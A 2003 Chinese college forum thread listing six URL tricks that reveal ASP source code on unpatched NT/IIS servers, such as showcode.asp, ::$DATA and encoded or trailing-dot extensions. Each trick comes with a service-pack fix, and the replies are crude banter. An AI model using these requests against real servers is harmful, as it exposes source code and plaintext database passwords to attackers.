广西经贸职业技术学院论坛
标题:
偷看ASP原码的6种方法
[打印本页]
作者:
saviour
时间:
2003-12-25 08:01
标题:
偷看ASP原码的6种方法
在没有打Services Pack6补丁的NT server上,至少有6种方法可以看到ASP程序的源代码,它们是: </p><p> 1、http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp <br/> 解决方案:删除showcode.asp </p><p> 2、http://somewhere/something.asp:
DATA <br/> 解决方案: 装sp3 </p><p> 3、http://somewhere/something.asp%2e <br/> 解决方案: 装sp4 </p><p> or http://somewhere/something.asp.(加一个点) <br/> 解决方案: 装sp4 </p><p> 4、http://somewhere/something%2e%41sp <br/> 或者 http://somewhere/something%2e%asp <br/> 解决方案: 装sp4 </p><p> 5、http://somewhere/something.asp%81 <br/> 解决方案:装sp6或者打补丁 </p><p> 6、http://somewhere/iissamples/exair/howitworks/code.asp?source=xxx.asp </p><p> 最大的危害莫过于asp文件可以被上述方式读出;数据库密码以明文形式暴露在黑客眼前;<br/>
作者:
遗忘美男
时间:
2003-12-25 09:12
我日******
作者:
saviour
时间:
2003-12-25 11:44
我靠你好日
作者:
天涯¢浪子
时间:
2003-12-25 20:07
提示:
作者被禁止或删除 内容自动屏蔽
欢迎光临 广西经贸职业技术学院论坛 (http://gxjmbbs.com/)
Powered by Discuz! X3.2